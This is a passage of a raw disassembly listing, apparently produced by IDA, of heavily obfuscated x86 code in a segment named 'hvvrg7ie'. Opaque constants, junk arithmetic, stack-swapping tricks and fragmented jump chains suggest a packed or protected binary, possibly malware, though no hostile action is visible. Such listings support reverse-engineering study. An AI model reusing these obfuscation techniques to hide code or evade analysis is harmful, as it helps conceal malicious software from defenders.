; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444315

loc_4509A0:				; CODE XREF: sub_444315+8F98j
		jnz	loc_43C9FE

loc_4509A6:				; CODE XREF: sub_444315:loc_4492D2j
		rol	ebx, 9
		xor	ebx, 0C71E4724h
		add	ebx, 5FC80D9Fh
		xchg	ebx, [esp+0]
		jmp	sub_458A13
; END OF FUNCTION CHUNK	FOR sub_444315
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_4509BD:				; CODE XREF: sub_43A0EC+7E8j
					; sub_43A0EC:loc_457183j
		mov	eax, [ebp-4]
		movzx	eax, word ptr [eax+6]
		mov	[ebp-10h], eax
		mov	eax, [ebp-4]
		jmp	loc_4432CE
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
		mov	edi, 8358A926h
		or	eax, edi
		jmp	sub_4584A8
; ---------------------------------------------------------------------------

loc_4509DB:				; CODE XREF: hvvrg7ie:00459E68j
		jns	loc_453A9E
		sbb	ebp, edx
		jmp	loc_43E1B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_4509E8:				; CODE XREF: sub_456F9F:loc_43EAD7j
		cmp	ecx, 960F53C2h
		jmp	loc_455081
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_4509F3:				; CODE XREF: hvvrg7ie:loc_451062j
		jge	loc_439A2C
; START	OF FUNCTION CHUNK FOR sub_4585BB

loc_4509F9:				; CODE XREF: sub_4585BB+1Cj
		jmp	loc_4546AB
; END OF FUNCTION CHUNK	FOR sub_4585BB
; ---------------------------------------------------------------------------

loc_4509FE:				; CODE XREF: hvvrg7ie:0043BB98j
		jmp	loc_44B0E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_450A03:				; CODE XREF: sub_43EE33-5DF3j
		jmp	nullsub_209
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
		dd 8B0DEEC1h, 9229E91Fh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_450A12:				; CODE XREF: hvvrg7ie:loc_450975j
		xchg	ebx, [edi]
		and	edx, 0E2C019FBh
		pushf
		jmp	loc_44EE13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_450A20:				; CODE XREF: sub_440643:loc_45A169j
		pop	ebx
		sub	ebx, 0E584402Eh
		cmp	ebx, 9F804599h
		jmp	loc_4488EB
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_450A32:				; CODE XREF: sub_451176:loc_45140Dj
		add	eax, 88F359B3h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_458505
		jmp	loc_442F97
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_450A47:				; CODE XREF: sub_445CCD+D71Aj
		mov	[ebx], esi
		popf
		cmp	ebx, 0D8234181h
		jmp	loc_44F297
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_450A55:				; CODE XREF: hvvrg7ie:0045390Dj
		jns	loc_4496D4

loc_450A5B:				; CODE XREF: hvvrg7ie:loc_43FC5Ej
		call	sub_4440CB
; START	OF FUNCTION CHUNK FOR sub_4395E7

loc_450A60:				; CODE XREF: sub_4395E7+C1E7j
		jmp	nullsub_488
; END OF FUNCTION CHUNK	FOR sub_4395E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DAA

loc_450A65:				; CODE XREF: sub_441DAA-5BD7j
		jmp	loc_439CF1
; END OF FUNCTION CHUNK	FOR sub_441DAA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_526. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_450A6B:				; CODE XREF: sub_44D2F8+DAA7j
		jmp	loc_45132B
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_450A70:				; CODE XREF: sub_457F6F-12A2j
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449EB1

loc_450A75:				; CODE XREF: sub_449EB1+8j
		jmp	nullsub_126
; END OF FUNCTION CHUNK	FOR sub_449EB1

; =============== S U B	R O U T	I N E =======================================



sub_450A7A	proc near		; DATA XREF: sub_43D824+Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DEB5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E6D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444696 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454B11 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E1F SIZE 0000001A BYTES

		call	sub_450C5A
		push	edi
		mov	edi, ebx
		xchg	edi, [esp+4+var_4]
		push	474569EEh
		pop	ebx
		jmp	loc_454C5E
sub_450A7A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_450A90:				; CODE XREF: hvvrg7ie:0045A10Ej
		shr	esi, 0Eh
		push	0AC1F6B56h

loc_450A98:				; CODE XREF: hvvrg7ie:0044A18Fj
		and	edx, 746B3BCh
		push	offset sub_454040
		jmp	loc_45A3DF

; =============== S U B	R O U T	I N E =======================================



sub_450AA8	proc near		; DATA XREF: sub_448620:loc_44A3CDo

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A8F7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043BE60 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CD79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D9DD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043DC26 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E823 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004429AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442DD4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044375B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443CFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444BA2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444BF8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004493C4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044A8E9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044AF5F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044BBE7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DF34 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044E081 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450BC7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004517E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451C75 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004538CF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004548BB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045594D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004559AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B73A SIZE 0000000A BYTES

		push	ebx
		call	sub_45038B

loc_450AAE:				; CODE XREF: sub_446E8C+E72j
		jmp	loc_43DC26
sub_450AA8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_450AB3:				; CODE XREF: sub_44957E-B16Aj
		jmp	loc_456AEE
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------
		test	ebp, ecx
		jmp	loc_445F16
; ---------------------------------------------------------------------------

loc_450ABF:				; CODE XREF: hvvrg7ie:004479EBj
		mov	edi, [eax]
		jo	loc_44B898
; START	OF FUNCTION CHUNK FOR sub_440195

loc_450AC7:				; CODE XREF: sub_440195:loc_4479D5j
		add	eax, 55BCC3E7h
		call	sub_450C5A
		mov	ds:dword_41D108, eax
		lea	eax, nullsub_190
		jmp	loc_44224F
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFB4

loc_450AE3:				; CODE XREF: sub_43BFB4+D90j
		shr	edx, 3
		push	0DACC3680h
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		jmp	loc_447447
; END OF FUNCTION CHUNK	FOR sub_43BFB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_450AF5:				; CODE XREF: sub_450590:loc_455A3Fj
		add	esi, 7964133h
		test	esi, 80000000h
		jmp	loc_458828
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_450B06:				; CODE XREF: sub_43B547+14A8Cj
		jnz	loc_445AAF

loc_450B0C:				; CODE XREF: sub_453DC0+20j
		jmp	nullsub_246
; END OF FUNCTION CHUNK	FOR sub_43B547
; ---------------------------------------------------------------------------

loc_450B11:				; CODE XREF: hvvrg7ie:0044CCF2j
		jmp	loc_447A28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_450B16:				; CODE XREF: sub_453BBD-B16Bj
		jmp	sub_451703
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		jno	loc_43FB2E
		jz	loc_446DD8
		ror	ebp, 12h
		jmp	loc_445AAF
; ---------------------------------------------------------------------------

loc_450B2F:				; CODE XREF: hvvrg7ie:0043F895j
		call	sub_439549
		test	al, al
		jz	loc_450739
		jmp	loc_4463F4
; ---------------------------------------------------------------------------
		push	esi
		push	0AF2FBFC1h
		pop	esi
		or	esi, 971AA425h
		jmp	loc_4468AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_450B53:				; CODE XREF: sub_43D30A+C6ABj
		popf
		jmp	loc_44C950
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44808A

loc_450B59:				; CODE XREF: sub_44808A-101Fj
		pop	edi
		xchg	esi, [edi]
		or	ebx, ebp

loc_450B5E:				; CODE XREF: sub_44808A:loc_445123j
		push	0F44459BEh
		jmp	loc_445914
; END OF FUNCTION CHUNK	FOR sub_44808A
; ---------------------------------------------------------------------------
		jnp	loc_449E0E
		jmp	sub_44E533
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_450B74:				; CODE XREF: sub_4465A6-22F8j
		jmp	loc_454B94
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A86A

loc_450B79:				; CODE XREF: sub_43A86A+9j
		jmp	loc_452D1C
; END OF FUNCTION CHUNK	FOR sub_43A86A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_450B7E:				; CODE XREF: sub_43D285+1783Cj
		jl	loc_44C36B
		popf

loc_450B85:				; CODE XREF: sub_43D285:loc_453B09j
		push	0
		push	ecx
		jmp	loc_4452CE
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_450B8D:				; CODE XREF: hvvrg7ie:00453040j
		push	2D88E42h
		pop	esi
		sub	esi, 69AE641Bh
		cmp	esi, 0E83E1CD4h
		jmp	loc_442A95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_450BA4:				; CODE XREF: sub_43F227+A482j
		popf
		mov	esi, 525A4AFDh

loc_450BAA:				; CODE XREF: sub_43F227-4C94j
					; sub_43F227:loc_43B1BDj ...
		jnz	loc_449A8B
		cmp	dword ptr [ebp-4], 5
		jnz	loc_450FA0
		jmp	loc_43E057
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_450BBF:				; CODE XREF: hvvrg7ie:00442350j
		jnb	loc_44B071
		add	edi, esi
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_450BC7:				; CODE XREF: sub_450AA8-5B30j
		and	edi, 7A45B613h
		xor	edi, 3FD480B5h

loc_450BD3:				; CODE XREF: sub_439549:loc_4590F0j
		add	edi, 0D0B02E3Bh
		jmp	loc_44DF34
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_450BDE	proc near		; DATA XREF: sub_444BE1:loc_45900Co

; FUNCTION CHUNK AT 00440E66 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445288 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045197E SIZE 00000018 BYTES

		call	sub_44DE0A
		mov	edx, 0BE8CE1B7h
		push	esi
		push	2B94B192h
		rol	esi, 0Ah
		jmp	loc_445288
sub_450BDE	endp

; ---------------------------------------------------------------------------
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, [ebp-8]
		push	eax
		call	sub_439AE3
		push	ecx
		mov	ecx, eax
		jmp	loc_44DD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_450C0D:				; CODE XREF: sub_453BA4:loc_451095j
		jnz	loc_452AFB
		jmp	loc_44C3AB
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------

loc_450C18:				; DATA XREF: sub_44B524:loc_44B52Eo
		jnz	loc_450779
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_4463AD
		mov	eax, [ebp+8]
		push	eax
		mov	eax, [ebp+8]
		jmp	loc_45076A
; ---------------------------------------------------------------------------

loc_450C37:				; CODE XREF: hvvrg7ie:00454F32j
		jz	loc_442A77
		xor	eax, edx

loc_450C3F:				; CODE XREF: hvvrg7ie:004550FDj
		or	edi, ecx
		adc	ebx, 0B687615Ch
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_450C47:				; CODE XREF: sub_43E60A:loc_43A650j
					; sub_43E60A+6j ...
		jmp	loc_43B937
; ---------------------------------------------------------------------------

loc_450C4C:				; CODE XREF: sub_43E60A+39B2j
					; hvvrg7ie:00458DFBj
		pop	ecx
		jmp	loc_44CF9A
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0D

loc_450C52:				; CODE XREF: sub_455E0D:loc_452F6Dj
		mov	ebp, esi
		pop	esi
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_455E0D

; =============== S U B	R O U T	I N E =======================================



sub_450C5A	proc near		; CODE XREF: sub_439190p
					; sub_44CB64:loc_439233j ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E03D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F5C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442381 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B53 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044D7D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450634 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450E66 SIZE 0000000C BYTES

		jo	loc_43E047
		mov	edx, ds:dword_4589F8
		or	edx, edx
		jnz	loc_4589E5
		jmp	loc_43F5C1
sub_450C5A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_450C73:				; CODE XREF: sub_44B1C6:loc_456C11j
		test	edi, edx
		jmp	loc_4573ED
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_450C7A:				; CODE XREF: sub_44616F:loc_45051Ej
		mov	ecx, ebp
		pop	ebp
		xor	ecx, ds:4000F4h
		jnz	loc_43DE5C

loc_450C89:				; CODE XREF: sub_451B45+8283j
		jmp	loc_44BF95
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------

loc_450C8E:				; CODE XREF: hvvrg7ie:00454163j
		jmp	loc_454BEF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_450C93:				; CODE XREF: sub_44D2F8-D4A1j
		jmp	loc_43907A
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		or	eax, 0C75991Ah
		jmp	loc_43DE56
; ---------------------------------------------------------------------------

loc_450CA3:				; DATA XREF: sub_4540B2+1E88o
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_44F66B
		push	edi
		push	787AB1F4h
		jmp	loc_45A8A4
; ---------------------------------------------------------------------------

loc_450CC2:				; DATA XREF: sub_44D240:loc_44D724o
		cmp	dword ptr [ebp-4], 0
		jz	loc_440EF1
		call	nullsub_22
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_450CD1:				; CODE XREF: sub_446A16:loc_44283Cj
					; sub_44A87E:loc_44AB6Ej
		jz	loc_43D39E
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		push	offset loc_455D8F
		jmp	nullsub_131
; END OF FUNCTION CHUNK	FOR sub_44A87E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_450CEB:				; CODE XREF: sub_45541B-14195j
		jmp	loc_44114C
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C421

loc_450CF0:				; CODE XREF: sub_43C421+16j
		add	eax, [ebp-4]
		add	eax, 18h

loc_450CF6:				; CODE XREF: sub_43EED4:loc_447391j
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		add	eax, [ebp-4]
		mov	[ebp-14h], eax
		jmp	loc_444567
; END OF FUNCTION CHUNK	FOR sub_43C421
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_393. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450D0B:				; CODE XREF: hvvrg7ie:00446E87j
		jmp	locret_4502D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_450D10:				; CODE XREF: sub_43D285+8437j
		jmp	loc_4494CE
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_450D15:				; CODE XREF: hvvrg7ie:0044E338j
		cmp	ds:dword_448D10, 0
		jnz	loc_447214
		jmp	loc_4493A0
; ---------------------------------------------------------------------------

locret_450D27:				; CODE XREF: hvvrg7ie:loc_45A1BAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_450D28:				; CODE XREF: sub_448ECC-33F1j
		jmp	loc_456E9B
; END OF FUNCTION CHUNK	FOR sub_448ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_450D2D:				; CODE XREF: sub_43E128+3A7Ej
		jmp	loc_442FC5
; END OF FUNCTION CHUNK	FOR sub_43E128

; =============== S U B	R O U T	I N E =======================================



sub_450D32	proc near		; DATA XREF: hvvrg7ie:0043D5ACo
		xchg	ebp, [esp+0]

loc_450D35:				; CODE XREF: hvvrg7ie:loc_44D953j
		push	offset sub_4429CE
		jmp	nullsub_523
sub_450D32	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_450D3F:				; CODE XREF: sub_44B69F+48B6j
		ror	edx, 10h

loc_450D42:				; CODE XREF: sub_4408FA:loc_445174j
		push	0EC5382DEh
		pop	eax
		and	eax, 3EE905D2h
		add	eax, 0B9B015A5h
		sub	eax, 0CFF9BCC0h
		jmp	loc_456D55
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------

loc_450D5F:				; CODE XREF: hvvrg7ie:00455D2Aj
		jno	loc_44FB8C
		cmp	edx, ebp

loc_450D67:				; CODE XREF: hvvrg7ie:loc_44F970j
		jmp	loc_4460AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_450D6D:				; CODE XREF: sub_450E01-16F79j
		jmp	nullsub_347
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_450D72:				; CODE XREF: sub_43B6A5-204Ej
		jmp	loc_447F1E
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_450D77:				; CODE XREF: sub_445CCD+9084j
		or	edi, 0BD5E7509h
		jmp	loc_4491C5
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		test	ecx, 2C0E6382h
		jmp	loc_45906A

; =============== S U B	R O U T	I N E =======================================



sub_450D8D	proc near		; CODE XREF: hvvrg7ie:004559CCp
					; hvvrg7ie:00459D40j

; FUNCTION CHUNK AT 00439B8B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00439CA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004400AD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440CF9 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00446B1E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C718 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00453F5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A916 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jnz	loc_446B1E
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-4], 4
		jmp	loc_439CA8
sub_450D8D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_450DA3:				; CODE XREF: sub_4522F8:loc_45156Bj
		call	sub_452609

loc_450DA8:				; CODE XREF: hvvrg7ie:0043D73Cj
		jmp	loc_43B5A5
; END OF FUNCTION CHUNK	FOR sub_4522F8
; ---------------------------------------------------------------------------

loc_450DAD:				; CODE XREF: hvvrg7ie:0044467Bj
		add	eax, edx

loc_450DAF:				; CODE XREF: hvvrg7ie:loc_444669j
		add	ecx, 0A850BA7Ch
		xchg	ecx, [esp]
		jmp	loc_44C214
; ---------------------------------------------------------------------------

loc_450DBD:				; CODE XREF: hvvrg7ie:loc_443340j
		jnz	loc_453D52

loc_450DC3:				; CODE XREF: hvvrg7ie:00444A3Ej
		jmp	loc_43F4CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_450DC8:				; CODE XREF: sub_441FE4-3E33j
		jmp	loc_44A317
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		pop	esi
		and	esi, ecx
		mov	ecx, ebp
		jmp	loc_43C57C
; ---------------------------------------------------------------------------
		jmp	ds:off_41D158
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_450DDD:				; CODE XREF: sub_4554E8:loc_4519BCj
					; hvvrg7ie:loc_451A2Cj	...
		xchg	esi, [esp+0]
		mov	edx, esi

loc_450DE2:				; CODE XREF: sub_454099:loc_43A7CEj
		pop	esi
		jnz	loc_439BDA
		jmp	loc_4530F2
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562B0

loc_450DEE:				; CODE XREF: sub_4562B0+Fj
		push	eax
		push	offset loc_43C123
		jmp	loc_4479E0
; END OF FUNCTION CHUNK	FOR sub_4562B0

; =============== S U B	R O U T	I N E =======================================



sub_450DF9	proc near		; DATA XREF: sub_43BF23+158F3o
		xchg	esi, [esp+0]
		jmp	loc_4508FF
sub_450DF9	endp


; =============== S U B	R O U T	I N E =======================================



sub_450E01	proc near		; CODE XREF: hvvrg7ie:0043965Dj
					; sub_43DE01+4p

; FUNCTION CHUNK AT 00439E7C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043ADE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442629 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442D01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443F07 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445714 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E92 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FA48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450D6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567BF SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045948E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045B803 SIZE 00000020 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	20573B22h
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
		jmp	loc_44FA48
sub_450E01	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_450E15:				; CODE XREF: sub_441FE4:loc_45AB87j
		pop	eax
		xor	eax, 0ED96812Ah
		sub	eax, 0E33D3CB9h
		add	eax, 0A97E6442h
		jmp	loc_44483F
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
		push	eax
		call	dword ptr [ebp-4]
		test	eax, eax
		jz	loc_44A3DE
		jmp	loc_448520
; ---------------------------------------------------------------------------

loc_450E3E:				; CODE XREF: hvvrg7ie:0045B4D8j
		or	eax, 0D4EB8ED0h
		add	eax, 912F6B53h
		and	eax, 71F4ADDBh
		jnz	loc_459AE9
; START	OF FUNCTION CHUNK FOR sub_443048

loc_450E56:				; CODE XREF: sub_443048+4E96j
		jmp	loc_440A00
; END OF FUNCTION CHUNK	FOR sub_443048
; ---------------------------------------------------------------------------
		mov	[ecx], ebp
		and	edx, eax
		jmp	sub_45B07D
; ---------------------------------------------------------------------------

loc_450E64:				; DATA XREF: sub_4465A6+12D97o
		push	eax
		push	eax
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_450E66:				; CODE XREF: sub_450C5A-12C18j
		mov	edx, eax
		call	sub_456DE7
		jmp	loc_442381
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------

loc_450E72:				; CODE XREF: hvvrg7ie:0044C7E0j
		jl	loc_44080A
; START	OF FUNCTION CHUNK FOR sub_439873

loc_450E78:				; CODE XREF: sub_439873+7BF7j
		jmp	sub_446B99
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
		jle	loc_441F5E
		cmp	esi, ebx
		jmp	loc_440804
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_439. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_450E8B:				; CODE XREF: sub_443452:loc_456B94j
		jmp	loc_44DB39
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_450E90:				; CODE XREF: hvvrg7ie:004523B5j
					; sub_44989C+C6B0j
		jmp	loc_453CCC
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------

loc_450E95:				; CODE XREF: hvvrg7ie:0044F59Dj
		jmp	loc_43CFBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_450E9A:				; CODE XREF: sub_43FC15:loc_44D3D6j
		push	0A1803BAh
		jmp	loc_439D4E
; END OF FUNCTION CHUNK	FOR sub_43FC15

; =============== S U B	R O U T	I N E =======================================



sub_450EA4	proc near		; CODE XREF: hvvrg7ie:00452351j
					; hvvrg7ie:0045A177p
		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		push	offset loc_445EC7
		jmp	nullsub_502
sub_450EA4	endp

; ---------------------------------------------------------------------------

loc_450EB8:				; CODE XREF: hvvrg7ie:00442228j
		mov	ebx, eax

loc_450EBA:				; CODE XREF: hvvrg7ie:loc_442213j
		rol	ecx, 1Ah
		or	ecx, 0C304F941h
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_450EC3:				; CODE XREF: sub_4465A6+1157Aj
		add	ecx, 3CAF4153h
		jmp	loc_4406A9
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_450ECE:				; CODE XREF: hvvrg7ie:0044438Dj
		and	edx, 0C19C0C8Eh
		add	edx, 7EB0620Ch
		xchg	edx, [esp]
		jmp	loc_448961

; =============== S U B	R O U T	I N E =======================================



